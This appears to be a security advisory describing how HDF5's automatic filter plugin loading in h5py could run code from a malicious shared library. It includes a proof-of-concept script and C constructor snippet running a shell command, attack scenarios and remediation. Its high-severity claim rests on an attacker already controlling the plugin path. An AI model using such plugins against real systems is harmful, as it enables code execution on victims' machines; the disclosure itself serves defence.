# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py
## Target
- **Project:** h5py/h5py
- **URL:** https://github.com/h5py/h5py
- **Component:** HDF5 filter pipeline / dataset read path
- **CWE:** CWE-94 (Improper Control of Generation of Code / Code Injection)
## Severity: HIGH
## Summary
When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (`.so`/`.dll`) filter plugin from directories in the plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs.
## Vulnerable Code
### File: `h5py/h5py/h5z.pyx` (lines 102-121)
```python
@with_phil
def register_filter(uintptr_t cls_pointer_address):
    '''(INT cls_pointer_address) => BOOL

    Register a new filter from the memory address of a buffer containing a
    ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

    `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
    library::

        import ctypes
        filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
        filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p
        h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())
    '''
    return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
```
### File: `h5py/h5py/h5pl.pyx` (lines 20-25)
```python
cpdef append(const char* search_path):
    """(STRING search_path)

    Add a directory to the end of the plugin search path.
    """
    H5PLappend(search_path)
```
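The `h5py.h5pl` module also exposes `prepend`, `insert`, `remove`, `get`, and `size`, so the process-wide search path can be inspected as well as extended. A minimal sketch (the directory name here is illustrative, not a real path):

```python
import h5py

# Append an (illustrative) directory to the process-wide plugin search path.
# Paths are passed and returned as bytes at this low-level API.
h5py.h5pl.append(b'/tmp/extra_plugins')

# Enumerate the current search path
paths = [h5py.h5pl.get(i) for i in range(h5py.h5pl.size())]
print(paths)
```

Because the path is process-global, any code that later reads an HDF5 file in the same interpreter inherits the modified search path.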
### File: `h5py/h5py/_hl/filters.py` (lines 295-299)
When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
```python
elif isinstance(compression, int):
    if not allow_unknown_filter and not h5z.filter_avail(compression):
        raise ValueError("Unknown compression filter number: %s" % compression)
    plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
```
### Automatic Plugin Loading (HDF5 library behavior)
When `H5Dread()` is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers it automatically. This happens transparently inside:
- `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)`
- `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)`
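The search step can be modeled in a few lines of plain Python. This is an illustrative sketch of the lookup logic, not the actual C implementation inside libhdf5; the default directory shown is HDF5's documented Unix default and differs on Windows and per build:

```python
import glob
import os

# Documented Unix default; Windows uses %ALLUSERSPROFILE%\hdf5\lib\plugin
DEFAULT_PLUGIN_DIR = '/usr/local/hdf5/lib/plugin'

def candidate_plugins(env=os.environ):
    """Approximate the shared libraries HDF5 would consider dlopen()ing."""
    raw = env.get('HDF5_PLUGIN_PATH') or DEFAULT_PLUGIN_DIR
    found = []
    for directory in raw.split(os.pathsep):
        # Every matching library is a dlopen() candidate; an attacker only
        # needs write access to one directory on this list.
        found.extend(sorted(glob.glob(os.path.join(directory, '*.so'))))
    return found
```

The key point the sketch makes explicit: the search path comes entirely from the environment plus a world-known default, so controlling either is enough to control what gets loaded.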
## Exploitation
### Attack Scenario 1: Crafted HDF5 file + environment manipulation
1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration)
2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol
3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes
### Attack Scenario 2: h5pl API abuse in shared environments
In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading:
```python
import h5py

# Attacker injects malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')

# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
    data = f['dataset'][:]  # Triggers plugin loading -> RCE
```
### Proof of Concept
```python
import os

import h5py
import numpy as np

# Step 1: Create a malicious shared library (filter plugin).
# In practice, compile a .so whose constructor (or H5PLget_plugin_info path)
# runs arbitrary code:
#
#   gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
#
# where malicious_filter.c contains:
#
#   #include <stdlib.h>
#   void __attribute__((constructor)) init(void) { system("id > /tmp/pwned"); }

# Step 2: Point the plugin search path at the attacker-controlled directory
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'

# Step 3: Create an HDF5 file that references a custom filter
CUSTOM_FILTER_ID = 32000  # a non-standard, user-defined filter ID
with h5py.File('/tmp/crafted.h5', 'w') as f:
    # allow_unknown_filter bypasses the availability check during creation
    f.create_dataset(
        'payload',
        data=np.zeros(100),
        compression=CUSTOM_FILTER_ID,
        compression_opts=(0,),
        chunks=(100,),
        allow_unknown_filter=True,
    )

# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
    data = f['payload'][:]  # Triggers the automatic plugin search and dlopen()
```
## Impact
- **Arbitrary code execution** in the context of the process reading the HDF5 file
- This is particularly dangerous in:
- Data science pipelines that process untrusted HDF5 files
- ML model loading (legacy Keras/TensorFlow models are stored as HDF5)
- Scientific data sharing workflows
- Jupyter notebook environments processing external data
- h5py provides no mechanism to disable automatic filter plugin loading
- The `allow_unknown_filter=True` parameter on dataset creation explicitly supports writing datasets whose filter is not available locally, so crafted files are trivial to produce with stock h5py
## Remediation
1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading.
2. **Add a security warning** in documentation about the risks of processing untrusted HDF5 files
3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in
4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()`
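As an interim, process-level workaround, HDF5 itself honors the `HDF5_PLUGIN_PRELOAD` environment variable: the documented special value `::` (the `H5PL_NO_PLUGIN` sentinel) disables dynamic plugin loading entirely. It must be set before the HDF5 library initializes, i.e. before h5py is imported:

```python
import os

# '::' is HDF5's documented "no plugins" sentinel for HDF5_PLUGIN_PRELOAD.
# Set it before importing h5py so libhdf5 sees it at initialization;
# subsequent reads of untrusted files can no longer dlopen() filter plugins.
os.environ['HDF5_PLUGIN_PRELOAD'] = '::'
```

The trade-off is that legitimate third-party filters (e.g. from the hdf5_plugins collection) also stop working in that process.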
## References
- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline